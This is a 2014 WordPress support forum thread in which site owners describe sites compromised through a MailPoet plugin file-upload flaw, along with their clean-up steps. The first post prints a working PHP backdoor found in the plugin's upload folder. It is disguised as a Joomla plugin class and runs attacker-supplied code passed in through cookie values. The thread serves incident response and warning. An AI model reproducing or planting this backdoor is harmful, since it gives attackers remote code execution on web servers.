Title: Plugin Hacked
Last modified: August 21, 2016

---

# Plugin Hacked

 *  Resolved [webmistress666](https://wordpress.org/support/users/webmistress666/)
 * (@webmistress666)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/)
 * > 2.6.8 – 2014-07-04
   >  Fixed security issue reported by Dominic
 * Well, I’m hoping this was the culprit, but regardless, our site was compromised
   via Mail Poet last week. There was a backdoor being used to send out massive 
   amounts of spam and our webhost had to shut it down.
 * Files were found in:
 * wp-content/upgrade/
    wp-content/uploads/ (a file called ajax.php) wp-content/
   uploads/wysija/themes/main/ wp-content/uploads/wysija/themes/main2/
 * These were always .php files, sometimes with a gibberish name, other times with
   a name like “ajax.php” or “index.php” where there shouldn’t have been one (in
   the themes folders).
 * The index.php file inside the “wysija/themes/main/” folders looked like this:
 *     ```
       <?php
       /**
        * @package     Joomla.Plugin.System
        * @since       1.5
        *
        *
        */
       class PlgSysJoomla {
       public function __construct() {
       $file=@$_COOKIE['ljNqe3'];
       if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
       $index=new PlgSysJoomla;
       ```
   
 * Anyway, anyone else have these issues? I updated Mail Poet, deleted all suspicious
   files, changed my FTP password, and am hoping that’s enough.
 * [https://wordpress.org/plugins/wysija-newsletters/](https://wordpress.org/plugins/wysija-newsletters/)

Viewing 15 replies - 1 through 15 (of 23 total)

1 [2](https://wordpress.org/support/topic/plugin-hacked-5/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/plugin-hacked-5/page/2/?output_format=md)

 *  [AddyBean](https://wordpress.org/support/users/addybean/)
 * (@addybean)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089247)
 * Yes! [http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html](http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html)
 * I’m in the process of backing everything up and plan to wipe out the whole WordPress
   directory and reinstall. I’m not sure if there are added files in there, but 
   many of the existing ones have been modified with an eval and base 64 code at
   the top. It looks like it’s managed to get into everything, not just the uploads
   area.
 * What I can’t figure out is if it could have inserted itself into the database
   proper, or if it just modified the WordPress directory. I’m hoping a reinstall
   alone will take care of it. Not sure how to go about checking the database for
   issues. Been through those links that keep getting posted here everytime someone
   says they’ve been hacked and still can’t find an answer to the db question.
 *  Thread Starter [webmistress666](https://wordpress.org/support/users/webmistress666/)
 * (@webmistress666)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089249)
 * Awesome, thanks for the link! We’ve had our site hacked before, years ago, and
   it was just like you’re describing with the base 64 encode. It was a TOTAL NIGHTMARE.
   We ended up just exporting all our content via WordPress to an XML file, wiping
   the installation entirely, installing a new one, and then importing the posts.
 * Luckily, that’s not happening to us currently. I’m hoping we managed to catch
   it in time. There were only about 4 suspicious files and nothing was encoded.
   Still, I’ll be sure to keep an eye out for anything fishy.
 * Good luck with yours.
 *  [dotlizard](https://wordpress.org/support/users/dotlizard/)
 * (@dotlizard)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089415)
 * I cleaned the initial infection, but there were backdoors — it roamed all through
   my webserver, with that base64 thing. I spent 8 hours cleaning everything, and
   it’s been clear since. I’m unwilling to do the “export everything then burn it
   with fire” approach just yet, but if it comes back I might have to.
 * I’m kind of bothered that there isn’t more information on this at MailPoet’s 
   site, at least a knowledge base article on the subject. To acknowledge such a
   severe vulnerability as a line item on a changelog seems a bit irresponsible,
   considering they gave hackers console-level access to our servers for four days.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089416)
 * What makes you think that the plugin had anything to do with the hack as opposed
   to simply being a victim of it?
 *  Thread Starter [webmistress666](https://wordpress.org/support/users/webmistress666/)
 * (@webmistress666)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089417)
 * Did you read the link AddyBean posted?
 * In my case, the first files were uploaded to the wysija/themes directory, which
   is what tipped me off to it being a hole in the plugin. Logs and security fixes
   confirmed.
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089454)
 * Hi there, all of my sites with MailPoet have been hacked. I’m pretty sure at 
   least one of them has the last version, so for now I just delete the plugin.
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 10 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089461)
 * A little update: actually, a file was uploaded to the themes directory on July
   5 BEFORE updating MailPoet, and it’s only in the night of Thursday the 17 at 
   23:45 (French time) that the flaw was exploited. So the current version may be
   clean, but despite updating the plugin, the flaw may persist because of the infected
   file in wp-content/upload/wysija/themes/*/*.php.
 * Sorry for my bad English.
 *  [kaostik](https://wordpress.org/support/users/kaostik/)
 * (@kaostik)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089464)
 * Hi Aral,
    your problem has been solved? I think also be infected since the night
   of Thursday to Friday. Je suis français désolé pour la traduction anglaise. Thanks
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089465)
 * Hi,
 * Yes problem solved the hard way:
    – reinstalled WP – reinstalled all plugins –
   reinstalled theme – verify and correct manually all files not updated in the 
   process (like wp-config.php) – verify database for “blank” admin user not be 
   created
 * — français 😉 —
 * Oui, problème résolu à la sauvage :
    – Réinstallé WP – Réinstallé tous les plugins–
   Réinstallé les thèmes – Vérification et correction manuelle de tous les fichiers
   non mis à jour dans le processus (comme wp-config.php) – Vérification de la base
   de données à la recherche d’un utilisateur admin créé en douce (j’ai lu ça sur
   un forum de sécurité, plusieurs hackers ont exploité la faille donc les attaques
   peuvent varier de la redirection de site, à la diffusion de malware, et jusqu’à
   la création de backdoor).
 * Pour la petite histoire, j’ai deux sites que je gère qui ont eu le problème (
   chez ovh, un qui a planté, l’autre que j’ai détecté moi-même une fois la source
   de l’infection connue), et on a fait appel à moi pour des conseils sur un autre,
   et enfin pour une intervention sur un quatrième (hébergé chez 1&1 dont l’anti-
   virus a détecté le problème et passé tous les fichiers php en droit 0200).
 * Je pense qu’il y a beaucoup, beaucoup de sites infectés non détectés qui traînent…
   car comme j’écrivais en anglais ci-dessus, le plug-in à beau être à jour, dans
   la fenêtre de temps de correction de la faille, des fichiers ‘backdoor’ ont été
   envoyés (tous dans wp-content/upload à priori).
 * Bon courage !
 *  [kaostik](https://wordpress.org/support/users/kaostik/)
 * (@kaostik)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089466)
 * Thanks for your answer
    Merci pour tes indications, j’ai déjà tout réinstallé
   une première fois, réinfecté 48h après, avec ce plugin toujours actif. Je viens
   de le viré, plus les fichiers suspects se trouvant dans upload également. J’hésite
   également a supprimé les données du plugin de ma base de registre. J’attends 
   maintenant de voir si je suis de nouveau infecté. Pour info, je suis sous ovh
   et j’avais une page blanche à la place de mon site, tous mes fichiers php étaient
   touchés.
 *  [aralici](https://wordpress.org/support/users/aralici/)
 * (@aralici)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089467)
 * The plugin is supposed to be clean now, so if you were reinfected when you had
   the latest version, this is probably because of the omission of one of the “backdoor”
   files… or the plugin is not so secure…
 * I don’t think you need to delete data in the database, just check if there is
   no new suspect user.
 * —
 * Le plugin est sensé être clean maintenant, donc si tu as été réinfecté alors 
   que tu avais la dernière version, c’est sûrement à cause de l’oubli d’un des 
   fichiers “backdoor”… ou alors que le plugin n’est pas sécurisé que ça.
 * Pas besoin de supprimer les données dans la base à priori, mais vérifier qu’il
   n’y a pas eu d’utilisateur suspect ajouté.
 *  [Artemisia1975](https://wordpress.org/support/users/artemisia1975/)
 * (@artemisia1975)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089468)
 * My site and that of a friend of mine was infected after the release of the update,
   on July 18. The server blocked my site as malicious and promised to put it back
   online only deleting the entire site. I have reinstalled WP, reinstalled all 
   plugins, reinstalled theme…
 *  [Wysija](https://wordpress.org/support/users/wysija/)
 * (@wysija)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089477)
 * Hi guys,
 * We’re really sorry for that.
 * We published a guide in our site which can help you recovering your sites:
 * [http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/](http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/)
 *  [davydov-denis](https://wordpress.org/support/users/davydov-denis/)
 * (@davydov-denis)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089478)
 * there was another hack attack recently, it seems it was not related to MailPoet,
   as some victims did not have it installed:
 *  [http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html](http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html)
 *  [BrooklynBob](https://wordpress.org/support/users/brooklynbob/)
 * (@brooklynbob)
 * [11 years, 9 months ago](https://wordpress.org/support/topic/plugin-hacked-5/#post-5089483)
 * My site was hacked **AFTER 2.6.8** was installed, and as a result, my host shut
   my site down this morning (with warning). After speaking with my host’s tech 
   support, I decided that the best thing to do is to “nuke and pave” – wipe my 
   directories, remove the database and start with a clean installation of WordPress,
   my theme and plugins, and hopefully restore my. The other alternative, according
   to them, was to review all of my files and search for malicious code. Unfortunately,
   Mailpoet’s support solution is vague and doesn’t really offer a true solution.
   So, as a result, I’m looking at many hours of work ahead. Thanks a frigging bunch,
   Mailpoet.

Viewing 15 replies - 1 through 15 (of 23 total)

1 [2](https://wordpress.org/support/topic/plugin-hacked-5/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/plugin-hacked-5/page/2/?output_format=md)

The topic ‘Plugin Hacked’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/wysija-newsletters_ffddcc.svg)
 * [MailPoet Newsletters (Previous)](https://wordpress.org/plugins/wysija-newsletters/)
 * [Support Threads](https://wordpress.org/support/plugin/wysija-newsletters/)
 * [Active Topics](https://wordpress.org/support/plugin/wysija-newsletters/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wysija-newsletters/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wysija-newsletters/reviews/)

 * 23 replies
 * 14 participants
 * Last reply from: [zifawebsolutions](https://wordpress.org/support/users/zifawebsolutions/)
 * Last activity: [11 years, 4 months ago](https://wordpress.org/support/topic/plugin-hacked-5/page/2/#post-5089522)
 * Status: resolved